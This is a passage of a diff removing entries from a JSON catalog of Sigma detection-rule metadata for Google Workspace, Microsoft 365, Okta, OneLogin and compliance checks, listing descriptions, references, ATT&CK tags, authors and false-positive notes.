- ], - "logsource.category": "No established category", - "logsource.product": "google_workspace" - } - }, - { - "description": "Detects when an a role is modified or deleted in Google Workspace.", - "uuid": "6aef64e3-60c6-4782-8db3-8448759c714e", - "value": "Google Workspace Role Modified or Deleted", - "meta": { - "refs": [ - "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", - "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-delegated-admin-settings", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gworkspace/gworkspace_role_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ], - "creation_date": "2021/08/24", - "filename": "gworkspace_role_modified_or_deleted.yml", - "author": "Austin Songer", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "google_workspace" - } - }, - { - "description": "Detects when an a role privilege is deleted in Google Workspace.", - "uuid": "bf638ef7-4d2d-44bb-a1dc-a238252e6267", - "value": "Google Workspace Role Privilege Deleted", - "meta": { - "refs": [ - "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", - "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-delegated-admin-settings", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gworkspace/gworkspace_role_privilege_deleted.yml" - ], - "tags": [ - "attack.impact" - ], - "creation_date": "2021/08/24", - "filename": "gworkspace_role_privilege_deleted.yml", - "author": "Austin Songer", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "google_workspace" - } - }, - { - "description": "Detects when an Google Workspace user is granted admin privileges.", - "uuid": "2d1b83e4-17c6-4896-a37b-29140b40a788", - "value": "Google Workspace User Granted Admin Privileges", - "meta": { - "refs": [ - 
"https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", - "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-user-settings#GRANT_ADMIN_PRIVILEGE", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gworkspace/gworkspace_user_granted_admin_privileges.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1098" - ], - "creation_date": "2021/08/23", - "filename": "gworkspace_user_granted_admin_privileges.yml", - "author": "Austin Songer", - "level": "medium", - "falsepositive": [ - "Google Workspace admin role privileges, may be modified by system administrators." - ], - "logsource.category": "No established category", - "logsource.product": "google_workspace" - } - }, - { - "description": "Detects when a Microsoft Cloud App Security reported for users whose account were terminated in Azure AD, but still perform activities in other platforms such as AWS or Salesforce.\nThis is especially relevant for users who use another account to manage resources, since these accounts are often not terminated when a user leaves the company.\n", - "uuid": "2e669ed8-742e-4fe5-b3c4-5a59b486c2ee", - "value": "Activity Performed by Terminated User", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", - "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_activity_by_terminated_user.yml" - ], - "tags": [ - "attack.impact" - ], - "creation_date": "2021/08/23", - "filename": "microsoft365_activity_by_terminated_user.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "m365" - } - }, - { - "description": "Detects when a Microsoft Cloud App Security reported when users were active from an IP address that has been identified as an anonymous proxy IP 
address.", - "uuid": "d8b0a4fe-07a8-41be-bd39-b14afa025d95", - "value": "Activity from Anonymous IP Addresses", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", - "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_activity_from_anonymous_ip_addresses.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1573" - ], - "creation_date": "2021/08/23", - "filename": "microsoft365_activity_from_anonymous_ip_addresses.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "User using a VPN or Proxy" - ], - "logsource.category": "No established category", - "logsource.product": "m365" - } - }, - { - "description": "Detects when a Microsoft Cloud App Security reported when an activity occurs from a location that wasn't recently or never visited by any user in the organization.", - "uuid": "0f2468a2-5055-4212-a368-7321198ee706", - "value": "Activity from Infrequent Country", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", - "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_activity_from_infrequent_country.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1573" - ], - "creation_date": "2021/08/23", - "filename": "microsoft365_activity_from_infrequent_country.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "m365" - } - }, - { - "description": "Detects when a Microsoft Cloud App Security reported when a user or IP address uses an app that is not sanctioned to perform an activity that resembles an attempt to exfiltrate information from your organization.", - 
"uuid": "2b669496-d215-47d8-bd9a-f4a45bf07cda", - "value": "Data Exfiltration to Unsanctioned Apps", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", - "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_data_exfiltration_to_unsanctioned_app.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1537" - ], - "creation_date": "2021/08/23", - "filename": "microsoft365_data_exfiltration_to_unsanctioned_app.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "m365" - } - }, - { - "description": "Detects when a Microsoft Cloud App Security reported users were active from an IP address identified as risky by Microsoft Threat Intelligence.\nThese IP addresses are involved in malicious activities, such as Botnet C&C, and may indicate compromised account.\n", - "uuid": "a3501e8e-af9e-43c6-8cd6-9360bdaae498", - "value": "Activity from Suspicious IP Addresses", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", - "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_from_susp_ip_addresses.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1573" - ], - "creation_date": "2021/08/23", - "filename": "microsoft365_from_susp_ip_addresses.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "m365" - } - }, - { - "description": "Detects when a Microsoft Cloud App Security reported a risky sign-in attempt due to a login associated with an impossible travel.", - "uuid": 
"d7eab125-5f94-43df-8710-795b80fa1189", - "value": "Microsoft 365 - Impossible Travel Activity", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", - "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_impossible_travel_activity.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1078" - ], - "creation_date": "2020/07/06", - "filename": "microsoft365_impossible_travel_activity.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "m365" - } - }, - { - "description": "Detects when a Microsoft Cloud App Security reported when a user signs into your sanctioned apps from a risky IP address.", - "uuid": "c191e2fa-f9d6-4ccf-82af-4f2aba08359f", - "value": "Logon from a Risky IP Address", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", - "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_logon_from_risky_ip_address.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1078" - ], - "creation_date": "2021/08/23", - "filename": "microsoft365_logon_from_risky_ip_address.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "m365" - } - }, - { - "description": "Alert for the addition of a new federated domain.", - "uuid": "42127bdd-9133-474f-a6f1-97b6c08a4339", - "value": "New Federated Domain Added", - "meta": { - "refs": [ - "https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/wp-m-unc2452-2021-000343-01.pdf", - "https://us-cert.cisa.gov/ncas/alerts/aa21-008a", - 
"https://www.splunk.com/en_us/blog/security/a-golden-saml-journey-solarwinds-continued.html", - "https://www.sygnia.co/golden-saml-advisory", - "https://o365blog.com/post/aadbackdoor/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_new_federated_domain_added.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1136.003" - ], - "creation_date": "2022/02/08", - "filename": "microsoft365_new_federated_domain_added.yml", - "author": "@ionsor", - "level": "medium", - "falsepositive": [ - "The creation of a new Federated domain is not necessarily malicious, however these events need to be followed closely, as it may indicate federated credential abuse or backdoor via federated identities at a similar or different cloud provider." - ], - "logsource.category": "No established category", - "logsource.product": "m365" - } - }, - { - "description": "Detects when a Microsoft Cloud App Security reported when a user uploads files to the cloud that might be infected with ransomware.", - "uuid": "bd132164-884a-48f1-aa2d-c6d646b04c69", - "value": "Microsoft 365 - Potential Ransomware Activity", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", - "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_potential_ransomware_activity.yml" - ], - "tags": [ - "attack.impact", - "attack.t1486" - ], - "creation_date": "2021/08/19", - "filename": "microsoft365_potential_ransomware_activity.yml", - "author": "austinsonger", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "m365" - } - }, - { - "description": "Alert on when a user has performed an eDiscovery search or exported a PST file from the search. 
This PST file usually has sensitive information including email body content", - "uuid": "18b88d08-d73e-4f21-bc25-4b9892a4fdd0", - "value": "PST Export Alert Using eDiscovery Alert", - "meta": { - "refs": [ - "https://learn.microsoft.com/en-us/microsoft-365/compliance/alert-policies?view=o365-worldwide", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_pst_export_alert.yml" - ], - "tags": [ - "attack.collection", - "attack.t1114" - ], - "creation_date": "2022/02/08", - "filename": "microsoft365_pst_export_alert.yml", - "author": "Sorina Ionescu", - "level": "medium", - "falsepositive": [ - "PST export can be done for legitimate purposes but due to the sensitive nature of its content it must be monitored." - ], - "logsource.category": "No established category", - "logsource.product": "m365" - } - }, - { - "description": "Alert when a user has performed an export to a search using 'New-ComplianceSearchAction' with the '-Export' flag. This detection will detect PST export even if the 'eDiscovery search or exported' alert is disabled in the O365.This rule will apply to ExchangePowerShell usage and from the cloud.", - "uuid": "6897cd82-6664-11ed-9022-0242ac120002", - "value": "PST Export Alert Using New-ComplianceSearchAction", - "meta": { - "refs": [ - "https://learn.microsoft.com/en-us/powershell/module/exchange/new-compliancesearchaction?view=exchange-ps", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_pst_export_alert_using_new_compliancesearchaction.yml" - ], - "tags": [ - "attack.collection", - "attack.t1114" - ], - "creation_date": "2022/11/17", - "filename": "microsoft365_pst_export_alert_using_new_compliancesearchaction.yml", - "author": "Nikita Khalimonenkov", - "level": "medium", - "falsepositive": [ - "Exporting a PST can be done for legitimate purposes by legitimate sources, but due to the sensitive nature of PST content, it must be monitored." 
- ], - "logsource.category": "No established category", - "logsource.product": "m365" - } - }, - { - "description": "Detects when a Microsoft Cloud App Security reported suspicious email forwarding rules, for example, if a user created an inbox rule that forwards a copy of all emails to an external address.", - "uuid": "6c220477-0b5b-4b25-bb90-66183b4089e8", - "value": "Suspicious Inbox Forwarding", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", - "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_susp_inbox_forwarding.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1020" - ], - "creation_date": "2021/08/22", - "filename": "microsoft365_susp_inbox_forwarding.yml", - "author": "Austin Songer @austinsonger", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "m365" - } - }, - { - "description": "Detects when a Microsoft Cloud App Security reported when an app downloads multiple files from Microsoft SharePoint or Microsoft OneDrive in a manner that is unusual for the user.", - "uuid": "ee111937-1fe7-40f0-962a-0eb44d57d174", - "value": "Suspicious OAuth App File Download Activities", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", - "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_susp_oauth_app_file_download_activities.yml" - ], - "tags": [ - "attack.exfiltration" - ], - "creation_date": "2021/08/23", - "filename": "microsoft365_susp_oauth_app_file_download_activities.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": 
"m365" - } - }, - { - "description": "Detects when a Microsoft Cloud App Security reported a user has deleted a unusual a large volume of files.", - "uuid": "78a34b67-3c39-4886-8fb4-61c46dc18ecd", - "value": "Microsoft 365 - Unusual Volume of File Deletion", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", - "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_unusual_volume_of_file_deletion.yml" - ], - "tags": [ - "attack.impact", - "attack.t1485" - ], - "creation_date": "2021/08/19", - "filename": "microsoft365_unusual_volume_of_file_deletion.yml", - "author": "austinsonger", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "m365" - } - }, - { - "description": "Detects when a Security Compliance Center reported a user who exceeded sending limits of the service policies and because of this has been restricted from sending email.", - "uuid": "ff246f56-7f24-402a-baca-b86540e3925c", - "value": "Microsoft 365 - User Restricted from Sending Email", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", - "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_user_restricted_from_sending_email.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1199" - ], - "creation_date": "2021/08/19", - "filename": "microsoft365_user_restricted_from_sending_email.yml", - "author": "austinsonger", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "m365" - } - }, - { - "description": "Detects when an the Administrator role is assigned to an user or group.", - "uuid": 
"413d4a81-6c98-4479-9863-014785fd579c", - "value": "Okta Admin Role Assigned to an User or Group", - "meta": { - "refs": [ - "https://developer.okta.com/docs/reference/api/system-log/", - "https://developer.okta.com/docs/reference/api/event-types/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_admin_role_assigned_to_user_or_group.yml" - ], - "tags": [ - "attack.impact" - ], - "creation_date": "2021/09/12", - "filename": "okta_admin_role_assigned_to_user_or_group.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Administrator roles could be assigned to users or group by other admin users." - ], - "logsource.category": "No established category", - "logsource.product": "okta" - } - }, - { - "description": "Detects when a API token is created", - "uuid": "19951c21-229d-4ccb-8774-b993c3ff3c5c", - "value": "Okta API Token Created", - "meta": { - "refs": [ - "https://developer.okta.com/docs/reference/api/system-log/", - "https://developer.okta.com/docs/reference/api/event-types/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_api_token_created.yml" - ], - "tags": [ - "attack.persistence" - ], - "creation_date": "2021/09/12", - "filename": "okta_api_token_created.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "okta" - } - }, - { - "description": "Detects when a API Token is revoked.", - "uuid": "cf1dbc6b-6205-41b4-9b88-a83980d2255b", - "value": "Okta API Token Revoked", - "meta": { - "refs": [ - "https://developer.okta.com/docs/reference/api/system-log/", - "https://developer.okta.com/docs/reference/api/event-types/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_api_token_revoked.yml" - ], - "tags": [ - "attack.impact" - ], - "creation_date": "2021/09/12", - "filename": "okta_api_token_revoked.yml", - "author": "Austin 
Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "okta" - } - }, - { - "description": "Detects when an application is modified or deleted.", - "uuid": "7899144b-e416-4c28-b0b5-ab8f9e0a541d", - "value": "Okta Application Modified or Deleted", - "meta": { - "refs": [ - "https://developer.okta.com/docs/reference/api/system-log/", - "https://developer.okta.com/docs/reference/api/event-types/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_application_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ], - "creation_date": "2021/09/12", - "filename": "okta_application_modified_or_deleted.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "okta" - } - }, - { - "description": "Detects when an application Sign-on Policy is modified or deleted.", - "uuid": "8f668cc4-c18e-45fe-ad00-624a981cf88a", - "value": "Okta Application Sign-On Policy Modified or Deleted", - "meta": { - "refs": [ - "https://developer.okta.com/docs/reference/api/system-log/", - "https://developer.okta.com/docs/reference/api/event-types/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_application_sign_on_policy_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ], - "creation_date": "2021/09/12", - "filename": "okta_application_sign_on_policy_modified_or_deleted.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "okta" - } - }, - { - "description": "Detects when an attempt at deactivating or resetting MFA.", - "uuid": "50e068d7-1e6b-4054-87e5-0a592c40c7e0", - "value": "Okta MFA Reset or Deactivated", - "meta": { - "refs": [ - 
"https://developer.okta.com/docs/reference/api/system-log/", - "https://developer.okta.com/docs/reference/api/event-types/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_mfa_reset_or_deactivated.yml" - ], - "tags": [ - "attack.persistence" - ], - "creation_date": "2021/09/21", - "filename": "okta_mfa_reset_or_deactivated.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "If a MFA reset or deactivated was performed by a system administrator." - ], - "logsource.category": "No established category", - "logsource.product": "okta" - } - }, - { - "description": "Detects when an Network Zone is Deactivated or Deleted.", - "uuid": "9f308120-69ed-4506-abde-ac6da81f4310", - "value": "Okta Network Zone Deactivated or Deleted", - "meta": { - "refs": [ - "https://developer.okta.com/docs/reference/api/system-log/", - "https://developer.okta.com/docs/reference/api/event-types/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_network_zone_deactivated_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ], - "creation_date": "2021/09/12", - "filename": "okta_network_zone_deactivated_or_deleted.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "okta" - } - }, - { - "description": "Detects when an Okta policy is modified or deleted.", - "uuid": "1667a172-ed4c-463c-9969-efd92195319a", - "value": "Okta Policy Modified or Deleted", - "meta": { - "refs": [ - "https://developer.okta.com/docs/reference/api/system-log/", - "https://developer.okta.com/docs/reference/api/event-types/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_policy_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ], - "creation_date": "2021/09/12", - "filename": "okta_policy_modified_or_deleted.yml", - "author": "Austin Songer @austinsonger", - "level": "low", - 
"falsepositive": [ - "Okta Policies being modified or deleted may be performed by a system administrator.", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Okta Policies modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "logsource.category": "No established category", - "logsource.product": "okta" - } - }, - { - "description": "Detects when an Policy Rule is Modified or Deleted.", - "uuid": "0c97c1d3-4057-45c9-b148-1de94b631931", - "value": "Okta Policy Rule Modified or Deleted", - "meta": { - "refs": [ - "https://developer.okta.com/docs/reference/api/system-log/", - "https://developer.okta.com/docs/reference/api/event-types/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_policy_rule_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ], - "creation_date": "2021/09/12", - "filename": "okta_policy_rule_modified_or_deleted.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "okta" - } - }, - { - "description": "Detects when an security threat is detected in Okta.", - "uuid": "5c82f0b9-3c6d-477f-a318-0e14a1df73e0", - "value": "Okta Security Threat Detected", - "meta": { - "refs": [ - "https://okta.github.io/okta-help/en/prod/Content/Topics/Security/threat-insight/configure-threatinsight-system-log.htm", - "https://developer.okta.com/docs/reference/api/system-log/", - "https://developer.okta.com/docs/reference/api/event-types/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_security_threat_detected.yml" - ], - "tags": "No established tags", - "creation_date": "2021/09/12", - "filename": "okta_security_threat_detected.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - 
"Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "okta" - } - }, - { - "description": "Detects when unauthorized access to app occurs.", - "uuid": "6cc2b61b-d97e-42ef-a9dd-8aa8dc951657", - "value": "Okta Unauthorized Access to App", - "meta": { - "refs": [ - "https://developer.okta.com/docs/reference/api/system-log/", - "https://developer.okta.com/docs/reference/api/event-types/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_unauthorized_access_to_app.yml" - ], - "tags": [ - "attack.impact" - ], - "creation_date": "2021/09/12", - "filename": "okta_unauthorized_access_to_app.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "User might of believe that they had access." - ], - "logsource.category": "No established category", - "logsource.product": "okta" - } - }, - { - "description": "Detects when an user account is locked out.", - "uuid": "14701da0-4b0f-4ee6-9c95-2ffb4e73bb9a", - "value": "Okta User Account Locked Out", - "meta": { - "refs": [ - "https://developer.okta.com/docs/reference/api/system-log/", - "https://developer.okta.com/docs/reference/api/event-types/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_user_account_locked_out.yml" - ], - "tags": [ - "attack.impact" - ], - "creation_date": "2021/09/12", - "filename": "okta_user_account_locked_out.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "okta" - } - }, - { - "description": "Detects when an user assumed another user account.", - "uuid": "62fff148-278d-497e-8ecd-ad6083231a35", - "value": "OneLogin User Assumed Another User", - "meta": { - "refs": [ - "https://developers.onelogin.com/api-docs/1/events/event-resource", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/onelogin/onelogin_assumed_another_user.yml" - ], - "tags": [ - 
"attack.impact" - ], - "creation_date": "2021/10/12", - "filename": "onelogin_assumed_another_user.yml", - "author": "Austin Songer @austinsonger", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "onelogin" - } - }, - { - "description": "Detects when an user account is locked or suspended.", - "uuid": "a717c561-d117-437e-b2d9-0118a7035d01", - "value": "OneLogin User Account Locked", - "meta": { - "refs": [ - "https://developers.onelogin.com/api-docs/1/events/event-resource/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/onelogin/onelogin_user_account_locked.yml" - ], - "tags": [ - "attack.impact" - ], - "creation_date": "2021/10/12", - "filename": "onelogin_user_account_locked.yml", - "author": "Austin Songer @austinsonger", - "level": "low", - "falsepositive": [ - "System may lock or suspend user accounts." - ], - "logsource.category": "No established category", - "logsource.product": "onelogin" - } - }, - { - "description": "Before deploying any new asset, change all default passwords to have values consistent with administrative level accounts.\nSigma detects default credentials usage. Sigma for Qualys vulnerability scanner. 
Scan type - Vulnerability Management.\n", - "uuid": "1a395cbc-a84a-463a-9086-ed8a70e573c7", - "value": "Default Credentials Usage", - "meta": { - "refs": [ - "https://www.cisecurity.org/controls/cis-controls-list/", - "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", - "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", - "https://community.qualys.com/docs/DOC-6406-reporting-toolbox-focused-search-lists", - "https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/default_credentials_usage.yml" - ], - "tags": "No established tags", - "creation_date": "2019/03/26", - "filename": "default_credentials_usage.yml", - "author": "Alexandr Yampolskyi, SOC Prime", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "qualys" - } - }, - { - "description": "Ensure that all account usernames and authentication credentials are transmitted across networks using encrypted channels.\nEnsure that an encryption is used for all sensitive information in transit. 
Ensure that an encrypted channels is used for all administrative account access.\n", - "uuid": "d7fb8f0e-bd5f-45c2-b467-19571c490d7e", - "value": "Cleartext Protocol Usage", - "meta": { - "refs": [ - "https://www.cisecurity.org/controls/cis-controls-list/", - "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", - "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/firewall_cleartext_protocols.yml" - ], - "tags": "No established tags", - "creation_date": "2019/03/26", - "filename": "firewall_cleartext_protocols.yml", - "author": "Alexandr Yampolskyi, SOC Prime, Tim Shelton", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "firewall", - "logsource.product": "No established product" - } - }, - { - "description": "Configure systems to issue a log entry and alert when an account is added to or removed from any group assigned administrative privileges.\nSigma detects\nEvent ID 4728 indicates a \u2018Member is added to a Security Group\u2019.\nEvent ID 4729 indicates a \u2018Member is removed from a Security enabled-group\u2019 .\nEvent ID 4730 indicates a \u2018Security Group is deleted\u2019.\nThe case is not applicable for Unix OS.\nSupported OS - Windows 2008 R2 and 7, Windows 2012 R2 and 8.1, Windows 2016 and 10 Windows Server 2019, Windows Server 2000, Windows 2003 and XP.\n", - "uuid": "9cf01b6c-e723-4841-a868-6d7f8245ca6e", - "value": "Group Modification Logging", - "meta": { - "refs": [ - "https://www.cisecurity.org/controls/cis-controls-list/", - "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", - "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", - "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4728", - "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4729", - 
"https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4730", - "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=633", - "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=632", - "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=634", - "https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/group_modification_logging.yml" - ], - "tags": "No established tags", - "creation_date": "2019/03/26", - "filename": "group_modification_logging.yml", - "author": "Alexandr Yampolskyi, SOC Prime", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Host Without Firewall. Alert means not complied. Sigma for Qualys vulnerability scanner. Scan type - Vulnerability Management.", - "uuid": "6b2066c8-3dc7-4db7-9db0-6cc1d7b0dde9", - "value": "Host Without Firewall", - "meta": { - "refs": [ - "https://www.cisecurity.org/controls/cis-controls-list/", - "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", - "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/host_without_firewall.yml" - ], - "tags": "No established tags", - "creation_date": "2019/03/19", - "filename": "host_without_firewall.yml", - "author": "Alexandr Yampolskyi, SOC Prime", - "level": "low", - "falsepositive": "No established falsepositives", - "logsource.category": "No established category", - "logsource.product": "qualys" - } - }, - { - "description": "Ensure that all account usernames and authentication credentials are transmitted across networks using encrypted channels\nEnsure that an encryption is used for all sensitive information in transit.\nEnsure that an encrypted channels is used for all administrative account access.\n", - "uuid": 
